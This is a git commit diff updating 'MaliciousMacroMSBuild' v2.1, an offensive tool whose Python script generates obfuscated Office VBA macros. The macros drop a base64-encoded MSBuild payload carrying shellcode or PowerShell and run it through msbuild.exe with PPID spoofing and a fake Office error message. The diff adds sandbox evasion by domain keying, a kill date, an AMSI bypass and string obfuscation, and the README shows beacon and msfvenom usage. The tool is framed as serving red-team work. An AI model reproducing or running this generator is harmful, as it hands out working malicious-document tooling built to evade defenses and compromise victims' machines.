Update MaliciousMacroMSBuild v2.1
parent
d1996b52d0
commit
b42759339d
74
README.md
74
README.md
|
@ -1,21 +1,26 @@
|
|||
# Malicious Macro MSBuild Generator 2.0
|
||||
# Malicious Macro MSBuild Generator v2.1
|
||||
|
||||
## Description
|
||||
Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.
|
||||
Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass, this tool intended for adversary simulation and red teaming purpose.
|
||||
|
||||
## What is MSBuild
|
||||
|
||||
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.
|
||||
|
||||
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.
|
||||
|
||||
MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.
|
||||
## Disclaimer
|
||||
> MaliciousMacroMSBuild should be used for authorized red teaming and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
|
||||
|
||||
## Changelog
|
||||
* Added Option Macro AMSI Bypass (Thanks to outflank team)
|
||||
* Added PPID Spoofing {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
|
||||
* Added functionality auto removed csproj payload after execution
|
||||
* Added custom msbuild option
|
||||
```
|
||||
Version 2.1
|
||||
-----------
|
||||
+ Added sandbox evasion technique using environmental keying domain checking
|
||||
+ Added Kill Date format dd/mm/yyyy [28/02/2018]
|
||||
+ Move payload from public user to current user download folder
|
||||
|
||||
Version 2.0
|
||||
-----------
|
||||
+ Added Option Macro AMSI Bypass (Thanks to outflank team)
|
||||
+ Added PPID Spoofing {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
|
||||
+ Added functionality auto removed csproj payload after execution
|
||||
+ Added custom msbuild option
|
||||
```
|
||||
|
||||
## Usage
|
||||
```
|
||||
|
@ -31,32 +36,49 @@ MSBuild will compile and execute the inline task. MSBuild.exe is a signed Micros
|
|||
Malicious Macro MSBuild Generator v2.0
|
||||
Author : Rahmat Nurfauzi (@infosecn1nja)
|
||||
|
||||
usage: m3-gen.py [-h] -i INPUTFILE -p PAYLOAD -o OUTPUT [-a]
|
||||
usage: m3-gen.py [-h] -i INPUTFILE -p PAYLOAD -o OUTPUT [-a] [-d DOMAIN]
|
||||
[-k KILL_DATE]
|
||||
|
||||
optional arguments:
|
||||
-h, --help show this help message and exit
|
||||
-i INPUTFILE, --inputfile INPUTFILE
|
||||
Input file you want to embed into the macro
|
||||
-p PAYLOAD, --payload PAYLOAD
|
||||
Choose a payload for powershell or raw shellcode
|
||||
Choose a payload for powershell, raw shellcode or custom
|
||||
-o OUTPUT, --output OUTPUT
|
||||
Output filename for the macro
|
||||
-a, --amsi_bypass Macro AMSI Bypass Execute via ms office trusted location
|
||||
-d DOMAIN, --domain DOMAIN
|
||||
Sandbox evasion technique using environmental keying domain checking. Use comma separating to set multiple domains
|
||||
-k KILL_DATE, --kill_date KILL_DATE
|
||||
Set kill date format dd/MM/yyyy the payload do not run on or after this day
|
||||
```
|
||||
|
||||
## Example
|
||||
* Choose a payload you want to test like shellcode or powershell
|
||||
* Generate a raw shellcode in whatever framework you want (Cobalt Strike, Metasploit Framework)
|
||||
## Examples
|
||||
* Choose a payload you want to test like shellcode or powershell, the shellcode support stageless and staged payload
|
||||
* Generate a raw shellcode in whatever framework you want (Cobalt Strike, Empire, PoshC2)
|
||||
|
||||
`$ msfvenom -p windows/exec cmd="calc.exe" -f raw > payload.bin`
|
||||
`$ python M3G.py -p shellcode -i /path/payload.bin -o macro.vba`
|
||||
`$ python M3G.py -p powershell -i /path/payload.ps1 -o macro.vba`
|
||||
### Creation of a Shellcode MSBuild VBA Macro
|
||||
`python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba`
|
||||
|
||||
### Creation of a PowerShell MSBuild VBA Macro
|
||||
`python m3-gen.py -p powershell -i /path/payload.ps1 -o output.vba`
|
||||
|
||||
### Creation of a Custom MSBuild VBA Macro
|
||||
`python m3-gen.py -p custom -i /path/msbuild.xml -o output.vba`
|
||||
|
||||
### Creation of a Shellcode MSBuild VBA Macro With Kill Date
|
||||
`python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -k 20/03/2018`
|
||||
|
||||
### Creation of a Shellcode MSBuild VBA Macro With Environmental Keying
|
||||
* `python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain`
|
||||
* `python m3-gen.py -p shellcode -i /path/beacon.bin -o output.vba -d yourdomain, microsoft, github`
|
||||
|
||||
## Links
|
||||
|
||||
* https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
|
||||
* http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
|
||||
* https://lolbas-project.github.io/lolbas/Binaries/Msbuild/
|
||||
* https://attack.mitre.org/techniques/T1127/
|
||||
* https://msdn.microsoft.com/en-us/library/dd722601.aspx
|
||||
|
||||
## Credit
|
||||
Rahmat Nurfauzi (@infosecn1nja)
|
||||
## Author and Credits
|
||||
Author : Rahmat Nurfauzi - [@infosecn1nja](https://twitter.com/infosecn1nja)
|
||||
Credits : [@subTee](https://twitter.com/subtee) - For discovering msbuild technique
|
105
m3-gen.py
105
m3-gen.py
|
@ -23,7 +23,7 @@ def chunks(l, n):
|
|||
yield l[i:i+n]
|
||||
|
||||
def gen_str():
|
||||
return ''.join(random.choice(string.letters) for i in range(random.randint(12,20)))
|
||||
return ''.join(random.choice(string.letters) for i in range(random.randint(8,12)))
|
||||
|
||||
def minimize(output):
|
||||
output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
|
||||
|
@ -95,11 +95,17 @@ def generate_custom(filename):
|
|||
|
||||
return content
|
||||
|
||||
def generate_macro(msbuild_template, amsi_bypass=False):
|
||||
def generate_macro(msbuild_template, amsi_bypass=False, sandbox=False, killdate=False):
|
||||
Method = gen_str()
|
||||
Method2 = gen_str()
|
||||
Method3 = gen_str()
|
||||
Str = gen_str()
|
||||
Str2 = gen_str()
|
||||
|
||||
csproj = random.choice([
|
||||
"TrackPackageWeb","DebugInfo","CoppisAdditions","BusinessLayer",
|
||||
"NativeClientVSAddIn", "WikiUpdater","AuthorizeNet.Helpers",
|
||||
"CreateWordDoc","TimeSeries","JUpdate","UnityImageProcessing",
|
||||
"LogicLayer"])
|
||||
|
||||
msbuild_encoded = base64.b64encode(minimize(msbuild_template))
|
||||
chunk = list(chunks(msbuild_encoded,200))
|
||||
|
@ -117,21 +123,24 @@ def generate_macro(msbuild_template, amsi_bypass=False):
|
|||
macro_str += 'End Function\n\n'
|
||||
|
||||
macro_str += "Sub AutoNew()\n"
|
||||
macro_str += ' ' + Method
|
||||
if sandbox is not None:
|
||||
macro_str += ' ' + Method3
|
||||
else:
|
||||
macro_str += ' ' + Method
|
||||
macro_str += '\nEnd Sub\n\n'
|
||||
|
||||
macro_str += 'Function Base64Decode(ByVal vCode)\n'
|
||||
macro_str += 'Function decodeBase64(ByVal vCode)\n'
|
||||
macro_str += ' Dim oXML, oNode\n'
|
||||
macro_str += ' Set oXML = CreateObject("Msxml2.DOMDocument.3.0")\n'
|
||||
macro_str += ' Set oNode = oXML.CreateElement("base64")\n'
|
||||
macro_str += ' oNode.dataType = "bin.base64"\n'
|
||||
macro_str += ' oNode.Text = vCode\n'
|
||||
macro_str += ' Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)\n'
|
||||
macro_str += ' decodeBase64 = sBinToStr(oNode.nodeTypedValue)\n'
|
||||
macro_str += ' Set oNode = Nothing\n'
|
||||
macro_str += ' Set oXML = Nothing\n'
|
||||
macro_str += 'End Function\n'
|
||||
|
||||
macro_str += '\nPrivate Function Stream_BinaryToString(Binary)\n'
|
||||
macro_str += '\nPrivate Function sBinToStr(Binary)\n'
|
||||
macro_str += ' Const adTypeText = 2\n'
|
||||
macro_str += ' Const adTypeBinary = 1\n'
|
||||
macro_str += ' Dim BinaryStream\n'
|
||||
|
@ -142,45 +151,81 @@ def generate_macro(msbuild_template, amsi_bypass=False):
|
|||
macro_str += ' BinaryStream.Position = 0\n'
|
||||
macro_str += ' BinaryStream.Type = adTypeText\n'
|
||||
macro_str += ' BinaryStream.Charset = "us-ascii"\n'
|
||||
macro_str += ' Stream_BinaryToString = BinaryStream.ReadText\n'
|
||||
macro_str += ' sBinToStr = BinaryStream.ReadText\n'
|
||||
macro_str += ' Set BinaryStream = Nothing\n'
|
||||
macro_str += 'End Function\n\n'
|
||||
|
||||
macro_str += 'Function ' + Method + '()\n'
|
||||
|
||||
payload = Str+" = \"" + str(chunk[0]) + "\"\n"
|
||||
payload = Str+" = StrRev(\"" + str(chunk[0])[::-1] + "\")\n"
|
||||
|
||||
for chk in chunk[1:]:
|
||||
payload += " "+Str+" = "+Str+" + \"" + str(chk) + "\"\n"
|
||||
payload += " "+Str+" = "+Str+" + StrRev(\"" + str(chk)[::-1] + "\")\n"
|
||||
|
||||
macro_str += ' ' + payload
|
||||
|
||||
macro_str += '\n Open Environ("PUBLIC") & "\Downloads" & "\{}.csproj" For Output As #1\n'.format(Str2)
|
||||
macro_str += ' Print #1, Base64Decode(' + Str + ')\n'
|
||||
macro_str += '\n Open Environ(Replace("U###SE###RP###ROF###ILE","###","")) & "\\" & Replace("D###ow###nl###oa###ds","###","") & "\{}.csproj" For Output As #1\n'.format(csproj)
|
||||
macro_str += ' Print #1, decodeBase64(' + Str + ')\n'
|
||||
macro_str += ' Close #1\n\n'
|
||||
|
||||
macro_str += ' Delay("00:00:" & Int((20 - 1 + 1 ) * Rnd + 1))\n'
|
||||
# https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3
|
||||
macro_str += ' Set SW = GetObject("n" & "e" & "w" & ":" & Replace("{9BA0###597###2-F6A###8-11CF###-A44###2-00A###0C9###0A8###F3###9}","###","")).Item()\n'
|
||||
macro_str += ' SW.Document.Application.ShellExecute Replace("m###s###b###u###i###l###d###.e###x###e","###",""), Environ("PUBLIC") & "\Downloads" & "\{}.csproj", WhereIs(), Null, 0\n\n'.format(Str2)
|
||||
|
||||
macro_str += ' Set SW = GetObject("n" & "e" & "w" & ":" & Replace("{9B###A0###597###2-F6A###8-11CF###-A44###2-00A###0C9###0A8###F3###9}","###","")).Item()\n'
|
||||
macro_str += ' SW.Document.Application.ShellExecute Replace("m###s###b###u###i###l###d###.e###x###e","###",""), Environ(Replace("U###SE###RP###ROF###ILE","###","")) & "\\" & Replace("D###ow###nl###oa###ds","###","") & "\{}.csproj", WhereIs(), Null, 0\n\n'.format(csproj)
|
||||
macro_str += ' MsgBox "This application appears to be made on an older version of the Microsoft Office product suite. Visit https://microsoft.com for more information. [ErrorCode: 4439]", vbExclamation, "Microsoft Office Corrupt Application (Compatibility Mode)"\n\n'
|
||||
macro_str += ' WaitUntil = Now() + TimeValue("00:00:15")\n'
|
||||
macro_str += ' Do While Now < WaitUntil\n'
|
||||
macro_str += ' Loop\n'
|
||||
macro_str += ' kill Environ("PUBLIC") & "\Downloads" & "\{}.csproj"\n'.format(Str2)
|
||||
|
||||
macro_str += ' Delay("00:00:" & Int((10 - 1 + 1 ) * Rnd + 1))\n'
|
||||
macro_str += ' Kill Environ(Replace("U###SE###RP###ROF###ILE","###","")) & "\\" & Replace("D###ow###nl###oa###ds","###","") & "\{}.csproj"\n'.format(csproj)
|
||||
macro_str += 'End Function\n\n'
|
||||
|
||||
if sandbox is not None:
|
||||
macro_str += 'Function ' + Method3 + '()\n'
|
||||
domains = ' + '.join(['Chr({})'.format(ord(i)) for i in sandbox.lower()])
|
||||
macro_str += ' arrDomains = Split(%s, Chr(44))\n' % domains
|
||||
macro_str += ' If (UBound(Filter(arrDomains, LCASE(Environ("USERDOMAIN")))) > -1) = True Then\n'
|
||||
macro_str += ' ' + Method
|
||||
macro_str += "\n End If\n"
|
||||
macro_str += 'End Function\n\n'
|
||||
|
||||
if amsi_bypass == True:
|
||||
Method = Method2
|
||||
|
||||
if sandbox is not None:
|
||||
Method3 = Method2
|
||||
|
||||
macro_str += 'Sub Auto_Open()\n'
|
||||
|
||||
if killdate is not None:
|
||||
macro_str += ' Dim exdate As Date\n'
|
||||
macro_str += ' exdate = "%s"\n' % killdate
|
||||
macro_str += ' If Date < exdate Then\n '
|
||||
|
||||
if sandbox is not None:
|
||||
macro_str += ' ' + Method3
|
||||
else:
|
||||
macro_str += ' ' + Method
|
||||
|
||||
if killdate is not None:
|
||||
macro_str += '\n End If'
|
||||
|
||||
macro_str += '\nEnd Sub\n\n'
|
||||
|
||||
macro_str += 'Sub AutoOpen()\n'
|
||||
macro_str += ' ' + Method
|
||||
macro_str += ' Auto_Open'
|
||||
macro_str += '\nEnd Sub\n\n'
|
||||
|
||||
macro_str += 'Sub Workbook_Open()\n'
|
||||
macro_str += ' ' + Method
|
||||
macro_str += ' Auto_Open'
|
||||
macro_str += '\nEnd Sub\n\n'
|
||||
|
||||
macro_str += 'Function StrRev(StrR as String) As String\n'
|
||||
macro_str += ' For i = Len(StrR) to 1 Step-1\n'
|
||||
macro_str += ' var= Mid(StrR, i, 1)\n'
|
||||
macro_str += ' Rev = Rev & var\n'
|
||||
macro_str += ' Next\n'
|
||||
macro_str += ' StrRev = Rev\n'
|
||||
macro_str += 'End Function\n\n'
|
||||
|
||||
macro_str += 'Function FileExists(ByVal FileToTest As String) As Boolean\n'
|
||||
macro_str += ' FileExists = (Dir(FileToTest) <> "")\n'
|
||||
macro_str += 'End Function\n\n'
|
||||
|
@ -190,14 +235,20 @@ def generate_macro(msbuild_template, amsi_bypass=False):
|
|||
macro_str += ' Dim needful As String\n'
|
||||
macro_str += ' Dim location_pw As String\n\n'
|
||||
|
||||
macro_str += ' business = Replace("C:\Win###do###ws\###Micr###osof###t.NET\Fr###amewo###rk\\", "###", "")\n'
|
||||
macro_str += ' needful = Replace("\ms###bu###ild.###exe", "###", "")\n\n'
|
||||
macro_str += ' business = Replace("C###:\###Win###do###ws\###Micr###osof###t.NET\Fr###amewo###rk\\", "###", "")\n'
|
||||
macro_str += ' needful = Replace("\###ms###bu###ild.###exe", "###", "")\n\n'
|
||||
macro_str += ' If FileExists(business & "v4.0.30319\\" & needful) Then\n'
|
||||
macro_str += ' location_pw = business & "v4.0.30319\\"\n'
|
||||
macro_str += ' ElseIf FileExists(business & "v3.5\\" & needful) Then\n'
|
||||
macro_str += ' location_pw = business & "v3.5\\"\n'
|
||||
macro_str += ' End If\n'
|
||||
macro_str += ' WhereIs = location_pw\n'
|
||||
macro_str += 'End Function\n\n'
|
||||
|
||||
macro_str += 'Function Delay(time as String) As String\n'
|
||||
macro_str += ' WaitUntil = Now() + TimeValue(time)\n'
|
||||
macro_str += ' Do While Now < WaitUntil\n'
|
||||
macro_str += ' Loop\n'
|
||||
macro_str += 'End Function'
|
||||
|
||||
return macro_str
|
||||
|
@ -219,7 +270,7 @@ def banner():
|
|||
| $$ \/ | $$| $$$$$$/| $$$$$$/
|
||||
|__/ |__/ \______/ \______/
|
||||
|
||||
Malicious Macro MSBuild Generator v2.0
|
||||
Malicious Macro MSBuild Generator v2.1
|
||||
Author : Rahmat Nurfauzi (@infosecn1nja)
|
||||
"""
|
||||
|
||||
|
@ -232,6 +283,8 @@ if __name__ == "__main__":
|
|||
parser.add_argument('-p','--payload', help='Choose a payload for powershell, raw shellcode or custom', required=True)
|
||||
parser.add_argument('-o','--output', help='Output filename for the macro', required=True)
|
||||
parser.add_argument('-a','--amsi_bypass', help='Macro AMSI Bypass Execute via ms office trusted location', action='store_true')
|
||||
parser.add_argument('-d','--domain', help=' Sandbox evasion technique using environmental keying domain checking. Use comma separating to set multiple domains')
|
||||
parser.add_argument('-k','--kill_date', help='Set kill date format [dd/MM/yyyy] the payload do not run on or after this day')
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
|
@ -239,6 +292,8 @@ if __name__ == "__main__":
|
|||
payload = args.payload
|
||||
output = args.output
|
||||
amsi_bypass = args.amsi_bypass
|
||||
domain = args.domain
|
||||
killdate = args.kill_date
|
||||
|
||||
msbuild_payload = ''
|
||||
|
||||
|
@ -254,6 +309,6 @@ if __name__ == "__main__":
|
|||
|
||||
if msbuild_payload != '':
|
||||
print "[*] Writing msbuild {} payload.".format(payload)
|
||||
macro = generate_macro(msbuild_payload, amsi_bypass)
|
||||
macro = generate_macro(msbuild_payload, amsi_bypass, domain, killdate)
|
||||
output_file(output,macro)
|
||||
print "[*] {} macro sucessfully saved to disk.".format(output)
|
||||
|
|
|
@ -26,7 +26,6 @@
|
|||
public override bool Execute()
|
||||
{
|
||||
Program.Main();
|
||||
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue